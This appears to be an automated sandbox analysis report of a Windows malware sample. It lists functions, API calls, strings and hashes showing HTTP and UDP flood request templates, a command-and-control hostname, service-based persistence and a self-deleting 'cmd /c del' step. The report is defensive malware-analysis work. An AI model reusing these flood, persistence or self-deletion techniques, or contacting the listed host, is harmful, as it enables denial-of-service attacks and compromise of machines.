String ID: %s %s%s$D$E$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#$WS2_32.dll$WSASocketA$WSAStartup$a$a$closesocket$gethostbyname$gethostname$htons$setsockopt
API String ID: 1429884815-199250815
Opcode ID: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
Instruction ID: 3928dce49adfbc52beb91163b4814508b45c4256773abad5793f3461048422d7
Opcode Fuzzy Hash: aef3f8ff331de28161243151cb282a45085878c6413215fd1f1b1c987d615d29
Instruction Fuzzy Hash: 6282A271548385ABE320DB64CD45BEFBBE5EFC4704F00493EF685A7290DA74A9048B9B

Function 00405B10 Relevance: 96.6, APIs: 37, Strings: 18, Instructions: 346libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
GetProcAddress.KERNEL32(00000000), ref: 00405B50
LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
GetProcAddress.KERNEL32(00000000), ref: 00405B61
LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
GetProcAddress.KERNEL32(00000000), ref: 00405B72
LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
GetProcAddress.KERNEL32(00000000), ref: 00405B83
LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
GetProcAddress.KERNEL32(00000000), ref: 00405B98
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
GetProcAddress.KERNEL32(00000000), ref: 00405BA9
LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
GetProcAddress.KERNEL32(00000000), ref: 00405BBA
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
GetProcAddress.KERNEL32(00000000), ref: 00405BCB
LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
GetProcAddress.KERNEL32(00000000), ref: 00405BDC
LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
GetProcAddress.KERNEL32(00000000), ref: 00405BED
LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
GetProcAddress.KERNEL32(00000000), ref: 00405BFE
LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
GetProcAddress.KERNEL32(00000000), ref: 00405C0C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
strlen.MSVCRT ref: 00405C3F
strncmp.MSVCRT ref: 00405C53
GetLastError.KERNEL32 ref: 00405E3E

Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2

wsprintfA.USER32 ref: 00405CB5
_mbscat.MSVCRT ref: 00405CC7
_mbscat.MSVCRT ref: 00405CDA
memset.MSVCRT ref: 00405D00
_mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
_mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
_mbscat.MSVCRT ref: 00405F9D
lstrlen.KERNEL32(004059DB), ref: 00406014

Strings

ChangeServiceConfig2A, xrefs: 00405BE4
KERNEL32.dll, xrefs: 00405B90
OpenSCManagerA, xrefs: 00405B58
LockServiceDatabase, xrefs: 00405C03
%c%c%c%c%c%c.exe, xrefs: 00405CA9
SYSTEM\CurrentControlSet\Services\, xrefs: 00405F80, 00405F86
RegCloseKey, xrefs: 00405B36
CreateServiceA, xrefs: 00405BF5
Defghijk Mnopqrstu Wxyabcd Fghijklm Opq, xrefs: 00405D91, 00405DA1
ADVAPI32.dll, xrefs: 00405B3B, 00405B40, 00405B5D, 00405B6E, 00405B7F, 00405BA5, 00405BB6, 00405BC7, 00405BD8, 00405BE9, 00405BFA, 00405C08
Description, xrefs: 00406020, 00406026
CloseServiceHandle, xrefs: 00405B7A
StartServiceA, xrefs: 00405BB1
CopyFileA, xrefs: 00405B8B
RegOpenKeyA, xrefs: 00405BC2
RegSetValueExA, xrefs: 00405BA0
OpenServiceA, xrefs: 00405B69
UnlockServiceDatabase, xrefs: 00405BD3

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$_mbscat$_mbscpy$DirectoryErrorFileLastModuleNameWindowslstrlenmemsetstrlenstrncmpwsprintf
String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
API String ID: 386357465-766656692
Opcode ID: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
Opcode Fuzzy Hash: 0664e4838cc323b1f4e72241ddd9614066d39b97ab9bfac67c13d6ea83ed0be3
Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65

Function 00406DB0 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 379libraryloaderthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
GetProcAddress.KERNEL32(00000000), ref: 00406DD3
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
GetProcAddress.KERNEL32(00000000), ref: 00406DE4

Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2

Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B

socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
Sleep.KERNEL32(00000014), ref: 00406ECD
RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
GetProcAddress.KERNEL32(00000000), ref: 00406F13
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
GetProcAddress.KERNEL32(00000000), ref: 00406F24
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
GetProcAddress.KERNEL32(00000000), ref: 00406F35
socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
connect.WS2_32(00000000,?,00000010), ref: 00406FA7
send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
Sleep.KERNEL32(0000000A), ref: 00407032
RtlExitUserThread.NTDLL(00000000), ref: 0040703B
LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
GetProcAddress.KERNEL32(00000000), ref: 00407077
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
GetProcAddress.KERNEL32(00000000), ref: 0040708A
LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
GetProcAddress.KERNEL32(00000000), ref: 0040709B
sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
RtlExitUserThread.NTDLL(00000000), ref: 004071AB
Sleep.KERNEL32(000001F4), ref: 00407210
RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216

Strings

WSAStartup, xrefs: 00406F26, 00407079
htons, xrefs: 00406DC0, 00406F15
WS2_32.dll, xrefs: 00406DC5, 00406DDA, 00406F05, 00406F1A, 00406F2B, 0040707E, 00407091
closesocket, xrefs: 00406F00
GetTickCount, xrefs: 00407064
WSASocketA, xrefs: 0040708C
KERNEL32.dll, xrefs: 00407069
setsockopt, xrefs: 00406DD5

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$ExitThreadUser$Sleep$sendtosocket$connectgethostbynameinet_addrsend
String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
API String ID: 1080867297-3926040945
Opcode ID: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
Opcode Fuzzy Hash: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A

Function 00408130 Relevance: 61.6, APIs: 23, Strings: 12, Instructions: 327libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
GetProcAddress.KERNEL32(00000000), ref: 00408176
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
GetProcAddress.KERNEL32(00000000), ref: 00408188
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
GetProcAddress.KERNEL32(00000000), ref: 0040819D
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
GetProcAddress.KERNEL32(00000000), ref: 004081AF
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
GetProcAddress.KERNEL32(00000000), ref: 004081C1
LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
GetProcAddress.KERNEL32(00000000), ref: 004081D6
LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
GetProcAddress.KERNEL32(00000000), ref: 004081E8

Strings

WSAStartup, xrefs: 004074C0, 004081A2
E, xrefs: 0040835E
htons, xrefs: 00407482, 00407DA0, 0040817B
%d.%d.%d.%d, xrefs: 004084B7
gethostname, xrefs: 004081DB
WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
(, xrefs: 00408577
WSASocketA, xrefs: 004081C9
P, xrefs: 004083E4
setsockopt, xrefs: 004074AF, 00407DB5, 00408190
gethostbyname, xrefs: 0040815D

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
API String ID: 2574300362-3688028543
Opcode ID: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
Opcode Fuzzy Hash: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59

Function 00406C50 Relevance: 57.8, APIs: 6, Strings: 27, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
GetProcAddress.KERNEL32(00000000), ref: 00406C73
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
GetProcAddress.KERNEL32(00000000), ref: 00406C84
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
GetProcAddress.KERNEL32(00000000), ref: 00406C95

Strings

o, xrefs: 00406D6A
\, xrefs: 00406CD9
g, xrefs: 00406CEC
i, xrefs: 00406D58
m, xrefs: 00406CFA
, xrefs: 00406CFF
F, xrefs: 00406D04
n, xrefs: 00406D2A
\, xrefs: 00406D17
p, xrefs: 00406D61
I, xrefs: 00406D1C
n, xrefs: 00406D21
lstrcpyA, xrefs: 00406C86
E, xrefs: 00406D34
s, xrefs: 00406D12
p, xrefs: 00406D3D
lstrcatA, xrefs: 00406C75
o, xrefs: 00406CE7
\, xrefs: 00406D53
i, xrefs: 00406D09
., xrefs: 00406D73
, xrefs: 00406D2F
KERNEL32.dll, xrefs: 00406C65, 00406C7A, 00406C8B
GetSystemDirectoryA, xrefs: 00406C60
a, xrefs: 00406CF5
o, xrefs: 00406D46
P, xrefs: 00406CDE

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
API String ID: 2574300362-3412716298
Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB

Function 0040355B Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 117librarythreadloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
GetProcAddress.KERNEL32(00000000), ref: 00403578
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
ShellExecuteEx.SHELL32(0000003C), ref: 00403675
SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
GetCurrentProcess.KERNEL32(00000100), ref: 00403690
SetPriorityClass.KERNEL32(00000000), ref: 00403697
GetCurrentThread.KERNEL32 ref: 0040369B
SetThreadPriority.KERNEL32(00000000), ref: 004036A2
SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4

Strings

/c del , xrefs: 00403607
n, xrefs: 0040365D
Defghi Klmnopqr Tuv, xrefs: 00403565
> nul, xrefs: 00403627
KERNEL32.dll, xrefs: 0040356C
lstrcatA, xrefs: 00403567
O, xrefs: 00403651
e, xrefs: 00403659
COMSPEC, xrefs: 004035F6
<, xrefs: 00403647
p, xrefs: 00403655

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Priority$ClassCurrentNameThread$AddressChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcProcessShellShortVariable
String ID: > nul$/c del $<$COMSPEC$Defghi Klmnopqr Tuv$KERNEL32.dll$O$e$lstrcatA$n$p
API String ID: 3227834783-364147672
Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64

Function 00405244 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 86filelibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
GetProcAddress.KERNEL32(00000000), ref: 00405261
FindResourceA.KERNEL32(?,?,?), ref: 00405272
LoadResource.KERNEL32(?,00000000), ref: 00405291
LockResource.KERNEL32(00000000), ref: 004052A9
wsprintfA.USER32 ref: 004052C4
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004052E0
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
CloseHandle.KERNEL32(00000000), ref: 00405326

Strings

SizeofResource, xrefs: 00405250
kernel32.dll, xrefs: 00405255
hra%u.dll, xrefs: 004052BE

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: File$Resource$LoadWrite$AddressCloseCreateFindHandleLibraryLockPointerProclstrlenwsprintf
String ID: SizeofResource$hra%u.dll$kernel32.dll
API String ID: 1940342438-2774179399
Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4

Function 0040588B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58sleeplibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
GetProcAddress.KERNEL32(00000000), ref: 0040589F
Sleep.KERNEL32(000001F4), ref: 004058E2
Sleep.KERNEL32(000001F4), ref: 00405926
Sleep.KERNEL32(000001F4), ref: 00405961

Strings

ADVAPI32.dll, xrefs: 00405893
SetServiceStatus, xrefs: 0040588E

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$AddressLibraryLoadProc
String ID: ADVAPI32.dll$SetServiceStatus
API String ID: 238394870-1924299548
Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E

Function 0040351A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00404EA9,Defghi Klmnopqr Tuv), ref: 00403523
OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
DeleteService.ADVAPI32(00000000), ref: 0040354C
CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
CloseServiceHandle.ADVAPI32(00000000), ref: 00403556

Strings

Defghi Klmnopqr Tuv, xrefs: 0040352D

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpen$DeleteManager
String ID: Defghi Klmnopqr Tuv
API String ID: 204194956-1553144822
Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9

Function 00406BD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
GetProcAddress.KERNEL32(00000000), ref: 00406BE2

Strings

Defghi Klmnopqr Tuv, xrefs: 00406BD0
GetTickCount, xrefs: 00406BD1
KERNEL32.dll, xrefs: 00406BD6

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
API String ID: 2574300362-1458725802
Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798

Function 00403758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403798
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 004037B1
recv.WS2_32(00000000,?,00000008,00000000), ref: 004037CA

Strings

Defghi Klmnopqr Tuv, xrefs: 00403765

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: recvselect
String ID: Defghi Klmnopqr Tuv
API String ID: 741273618-1553144822
Opcode ID: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
Instruction ID: d88939a34068f27b08009573b9ec192b3f1388868b9ca5f3c15b88e7a2eb2fcd
Opcode Fuzzy Hash: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
